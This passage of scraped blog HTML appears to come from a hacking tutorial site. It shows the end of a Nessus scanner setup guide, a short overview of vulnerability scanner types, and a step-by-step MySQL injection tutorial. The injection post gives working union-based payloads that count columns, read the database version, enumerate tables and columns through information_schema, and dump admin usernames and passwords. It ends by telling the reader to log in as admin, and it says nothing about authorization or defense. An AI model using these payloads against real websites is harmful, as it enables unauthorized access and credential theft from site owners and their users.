<span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt;">· Misconfiguration (e.g. open mail relay, missing patches, etc.).<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: 18.0pt; margin-bottom: 1.2pt; margin-left: .25in; text-indent: -.25in;">
<span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt;">· Default passwords, a few common passwords, and blank/absent passwords on some system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary attack.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: 18.0pt; margin-bottom: 1.2pt; margin-left: .25in; text-indent: -.25in;">
<span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt;">· Denial of service against the TCP/IP stack by using mangled packets.<o:p></o:p></span></div>
<div class="MsoNormal">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">------------------------------------------------------------------------------------------------------<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Most
organisations do their network vulnerability assessments with this tool.<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">You
can download NESSUS from here:<o:p></o:p></span></span></div>
<div class="MsoNormal">
<a href="http://www.tenable.com/products/nessus/nessus-download-agreement">http://www.tenable.com/products/nessus/nessus-download-agreement</a></div>
<div class="MsoNormal">
Download and install Nessus. It is free of charge for personal
use and chargeable for business use in corporate offices.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
After installing you get a “Nessus Server Manager.exe” file and a “Nessus Client.exe” file on the Desktop. Open “Nessus Server Manager.exe” and you
will see something like this:</div>
<div class="MsoNormal">
<span class="Apple-style-span" style="font-family: Arial, sans-serif; font-size: x-small;"><span class="Apple-style-span" style="line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYTssbBfgB_i2cw73ZcGNBWdESVNKCG-3QBClSPQGlanFwn3AqJyrCwhduZSGVZPDkobosRlGPBCytCUtNHwcoqck1095LAtlHcVTuTw2rzz8XoCAhRTaxS_hkPE1Ir78Krzi8QttVQvo/s1600/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYTssbBfgB_i2cw73ZcGNBWdESVNKCG-3QBClSPQGlanFwn3AqJyrCwhduZSGVZPDkobosRlGPBCytCUtNHwcoqck1095LAtlHcVTuTw2rzz8XoCAhRTaxS_hkPE1Ir78Krzi8QttVQvo/s320/Untitled.png" width="270" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Now click on the “Manage users” button.</div>
<div class="MsoNormal">
Click on the “+” button to add a user and make that user an
admin, like below:</div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2xlKieJjSccGuLMNnp48qX8Da4ET8QYQbXdidmLEy28AQf50ZBXefLeyORG9FLMqxwk0QZIL0ttoyIfrh0DNJmGCJZbs9Nckb1e1HxKeGSPv9Ext3dCYvaD4e0hxTJSSx-YwUwx5jthI/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2xlKieJjSccGuLMNnp48qX8Da4ET8QYQbXdidmLEy28AQf50ZBXefLeyORG9FLMqxwk0QZIL0ttoyIfrh0DNJmGCJZbs9Nckb1e1HxKeGSPv9Ext3dCYvaD4e0hxTJSSx-YwUwx5jthI/s320/1.png" width="291" /></a></div>
<div class="MsoNormal">
<span><br /></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Then click on the “Start Nessus server” button.</div>
<div class="MsoNormal">
Now start the “Nessus
client”. A browser window opens at the address “https://localhost:8834/”.</div>
<div class="MsoNormal">
Now log in with the credentials you created under Manage users, like
below:</div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnte2htxdshHFL1a_2szuJhDMTqvV8HiS117zPMaXoYiScrvEKvN0Mk4DuHRl4XVk1Kr0hPRFljDbVVt1Z5ogriB5c0R35l3AUzMBOR4DQykpX9SYmGDYPxn2xmmuBP_LWvRL9XpmjImQ/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnte2htxdshHFL1a_2szuJhDMTqvV8HiS117zPMaXoYiScrvEKvN0Mk4DuHRl4XVk1Kr0hPRFljDbVVt1Z5ogriB5c0R35l3AUzMBOR4DQykpX9SYmGDYPxn2xmmuBP_LWvRL9XpmjImQ/s640/2.png" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
For a default scan:</div>
<div class="MsoNormal">
Click on the “scans” button and then click “add”.</div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmALnlNZYHpm5OriCgvJJAq8ocoyvDqZ7CxtonHNWQXoGXiRAcaKd0RZ7ZnfXynHS-DmWcQrN_xApLS4T9Saa33o1H7GTZH0ASier2_pdmvjUJ15g3_UdvYC90nTTxYuIsRRdO_4sJ00Q/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmALnlNZYHpm5OriCgvJJAq8ocoyvDqZ7CxtonHNWQXoGXiRAcaKd0RZ7ZnfXynHS-DmWcQrN_xApLS4T9Saa33o1H7GTZH0ASier2_pdmvjUJ15g3_UdvYC90nTTxYuIsRRdO_4sJ00Q/s640/3.png" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Now you get this:</div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmabrNpHk49uyqOuH2B6xURw_rl6jy07gZETBYyp0gx00Xnq3zBBtAPu4A3A1pA6kq2VJ6TWh2XwXz_TuopvUbC_7l4cAjGR_v18hiGCsRUCZnawr0bphPlD6KkA1dhH0fqkMTX_Ooh68/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="274" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmabrNpHk49uyqOuH2B6xURw_rl6jy07gZETBYyp0gx00Xnq3zBBtAPu4A3A1pA6kq2VJ6TWh2XwXz_TuopvUbC_7l4cAjGR_v18hiGCsRUCZnawr0bphPlD6KkA1dhH0fqkMTX_Ooh68/s640/4.png" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Type a name for the test, select a policy and enter the targets. If there is a
large number of IPs, upload them from a text file (Target file). Here the
policies are: “Internal network scan”, “external network scan” and “Web app
test”.</div>
<div class="MsoNormal">
If you are scanning an external network select that, and if you
are testing a web application select that task.</div>
<div class="MsoNormal">
I'm selecting Internal network just for testing.</div>
<div class="MsoNormal">
Then launch the scan: </div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfDO1kPcXk1AxJnSY3b3LXyJu1fta6qedcN0XjN3E9qOXpgT8H4x2AZGKswzf-o_dvh0soIZVGR7KTyVB8ttF0-JU7eYMyvl6iaAS8jcBRtMZPDXzOuL-sYNUW4NemFpDA5bAHMsD-oqY/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfDO1kPcXk1AxJnSY3b3LXyJu1fta6qedcN0XjN3E9qOXpgT8H4x2AZGKswzf-o_dvh0soIZVGR7KTyVB8ttF0-JU7eYMyvl6iaAS8jcBRtMZPDXzOuL-sYNUW4NemFpDA5bAHMsD-oqY/s640/5.png" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
The scan starts:</div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiP204piD-lklZD-TYDGAe9lvm0VN1AEcER3hpRCeM-B8OFjOC4nGHMpNf0Iv9K0DP1N0tgoFjeCuzbJxGvS_GYQ5z-sbqyadqwTnZuzKKfVl_yjikdhOqwKMd__FCPWU2jOaiyHHX8XbU/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="76" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiP204piD-lklZD-TYDGAe9lvm0VN1AEcER3hpRCeM-B8OFjOC4nGHMpNf0Iv9K0DP1N0tgoFjeCuzbJxGvS_GYQ5z-sbqyadqwTnZuzKKfVl_yjikdhOqwKMd__FCPWU2jOaiyHHX8XbU/s640/6.png" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
After the scan is completed click on the “Reports” button. </div>
<div class="MsoNormal">
Double click on the scan result (here it is “test123” in the
image below).</div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSAm9CdrzbqlM8Me-TWRdEks_R7IGxXsUmACXHtCG-SSDN22POJxQcV7vmnIwPfKaKyTsU0nxl6miNQeIG0tIZCCpsZmSGFwo0LOuL9LTD1OcOpxl2tBzZSXRjluF1wbHEEZWRFaIFqjE/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="92" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSAm9CdrzbqlM8Me-TWRdEks_R7IGxXsUmACXHtCG-SSDN22POJxQcV7vmnIwPfKaKyTsU0nxl6miNQeIG0tIZCCpsZmSGFwo0LOuL9LTD1OcOpxl2tBzZSXRjluF1wbHEEZWRFaIFqjE/s640/7.png" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Then you will get this page. Click on the “Download reports” button.</div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAXSVqIfqnlSn0NhpqpPN4p9SVZhpQ8YUdsvXxJZi2vyuy0UE1REuSy44FcFLhdtrH98PXJmyOUsr0xtnLrKu_7lQUGhzTaPwLyw8qWKuRv7g7KbBIIyeOzcJ0oYv1lyUYnRwbEo0VMY4/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAXSVqIfqnlSn0NhpqpPN4p9SVZhpQ8YUdsvXxJZi2vyuy0UE1REuSy44FcFLhdtrH98PXJmyOUsr0xtnLrKu_7lQUGhzTaPwLyw8qWKuRv7g7KbBIIyeOzcJ0oYv1lyUYnRwbEo0VMY4/s640/8.png" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Select the format of the report to download: .rtf or html.</div>
<div class="MsoNormal">
**<b>This is just the
basic default scan.</b></div>
<div class="MsoNormal">
<br /></div>
</div>sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com0tag:blogger.com,1999:blog-7651709861170417818.post-54311685335123512602011-10-14T23:04:00.000-07:002011-10-14T23:09:20.063-07:00SCANNING<p class="MsoNormal">A <b>vulnerability scanner</b> is a computer program designed to assess computers, computer systems, networks or applications for weaknesses. There are a number of types of vulnerability scanners available today, distinguished from one another by a focus on particular targets. While functionality varies between different types of vulnerability scanners, they share a common, core purpose of enumerating the vulnerabilities present in one or more targets.</p>
<p class="MsoNormal"><b><u><span style="font-size: 18.0pt; font-family: "Times New Roman","serif";">Types of Vulnerability Scanners</span></u></b></p>
<p class="MsoNormal"><span style="font-size: 12.0pt; font-family: "Times New Roman","serif";">· Port scanner</span></p>
<p class="MsoNormal"><span style="font-size: 12.0pt; font-family: "Times New Roman","serif";">· Network vulnerability scanner</span></p>
<p class="MsoNormal"><span style="font-size: 12.0pt; font-family: "Times New Roman","serif";">· Web application security scanner</span></p>
<p class="MsoNormal">We have different tools for each of these scanning methodologies. To scan for open ports we mostly use the tool called <b>NMAP</b>, or Superscan, etc.</p>
<p class="MsoNormal">For network security assessment we use tools like <b>GFI Languard</b>, <b>Retina</b> scanner or <b>NESSUS</b>. Most organisations use NESSUS as it gives a vast variety of scan techniques and reports the exact vulnerability together with a patching solution; the same goes for GFI, but GFI surpasses <b>Nessus</b> when targeting Windows hosts. Nessus works on and against different platforms.</p>
<p class="MsoNormal">The tools used for web app scanning are <b>ACUNETIX</b>, <b>IBM AppScan</b> or <b>WebInspect</b>, etc. We have many tools for web app security testing; Acunetix and IBM AppScan are the most used.</p>
<p class="MsoNormal">-----------------------------------------------------------------------------------------------------------------------------</p>
<p class="MsoNormal">[* I will be posting tutorials for all the tools mentioned above, which will be updated shortly. *]</p>sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com0tag:blogger.com,1999:blog-7651709861170417818.post-45863968592892371542011-09-25T23:19:00.000-07:002011-10-20T09:46:39.872-07:00MySQL Injection<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-size: 130%;"><span style="color: black; font-family: 'Courier New'; font-size: 10pt; font-weight: bold;">MYSQL injection</span></span><b><span style="color: black; font-family: 'Courier New'; font-size: 10pt;"><br /></span></b></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<b><span style="color: black; font-family: 'Courier New'; font-size: 10pt;"><br /></span></b></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<b><span style="color: black; font-family: 'Courier New'; font-size: 10pt;">Check for vulnerability:</span></b></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<b><span style="color: black; font-family: 'Courier New'; font-size: 10pt;">------------------------</span></b></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">Let's say that we have some site like this</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">http://www.site.com/news.php?id=5</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">Now, to test if it is vulnerable, we add a ' (quote) to the end of the URL,</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">and that would be http://www.site.com/news.php?id=5'</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">so if we get some error like</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">or something similar</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">that means it is vulnerable to SQL injection :)</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<b><span style="color: black; font-family: 'Courier New'; font-size: 10pt;">Find the number of columns:</span></b></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<b><span style="color: black; font-family: 'Courier New'; font-size: 10pt;">----------------------------</span></b></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">To find the number of columns we use the ORDER BY statement (it tells the database how to order the result).</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">So how do we use it? Just keep incrementing the number until we get an error.</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">http://www.site.com/news.php?id=5 order by 1/* <-- no error</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">http://www.site.com/news.php?id=5 order by 2/* <-- no error</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">http://www.site.com/news.php?id=5 order by 3/* <-- no error</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">http://www.site.com/news.php?id=5 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">That means it has 3 columns, because we got an error on 4.</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<b><span style="color: black; font-family: 'Courier New'; font-size: 10pt;">Check for UNION function:</span></b></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<b><span style="color: black; font-family: 'Courier New'; font-size: 10pt;">-------------------------</span></b></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">With UNION we can select more data in one SQL statement.</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">so we have</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">http://www.site.com/news.php?id=5 union all select 1,2,3/* </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">NOTE: if /* is not working or you get some error, then try -- instead;</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">it's a comment and it's important for our query to work properly.</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">(we already found that the number of columns is 3 in section 2.)</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">If we see some numbers on screen, i.e. 1, 2 or 3, then the UNION works :)</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<b><span style="color: black; font-family: 'Courier New'; font-size: 10pt;">Check for MySQL version:</span></b></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<b><span style="color: black; font-family: 'Courier New'; font-size: 10pt;">------------------------</span></b></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">http://www.site.com/news.php?id=5 union all select 1,2,3,4/* </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">Let's say that we have the number 4 on the screen. Now, to check the version,</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">we replace the number 4 with @@version or version() and get something like 4.1.33-log or 5.0.45 or similar.</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">The version should be greater than 5; if it is less than 5 you have to guess the table name, because information_schema only exists from MySQL 5.0 on.</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<b><span style="color: black; font-family: 'Courier New'; font-size: 10pt;">Getting table and column name:</span></b></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<b><span style="color: black; font-family: 'Courier New'; font-size: 10pt;">-------------------------------</span></b></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<b><span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></b></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">http://www.site.com/news.php?id=5 union all select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">We get the table names. Look for a table named admin or similar that holds the login users.</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">Now to check the column names.</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">To check the columns, replace the word “table” with “column”:</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">http://www.site.com/news.php?id=5 union all select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=hex_value</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">Note: the table name should be given as a hex value (this works most of the time).</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">We get the columns displayed on screen: userid, passwd, etc.</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">Now, to retrieve the values, use:</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">Note that I put 0x3a, which is the hex value for : (a colon).</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">Now username:password is displayed on screen, i.e. admin:admin or admin:somehash.</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="color: black; font-family: 'Courier New'; font-size: 10pt;">When you have this, you can log in as admin or some superuser :D</span></div>
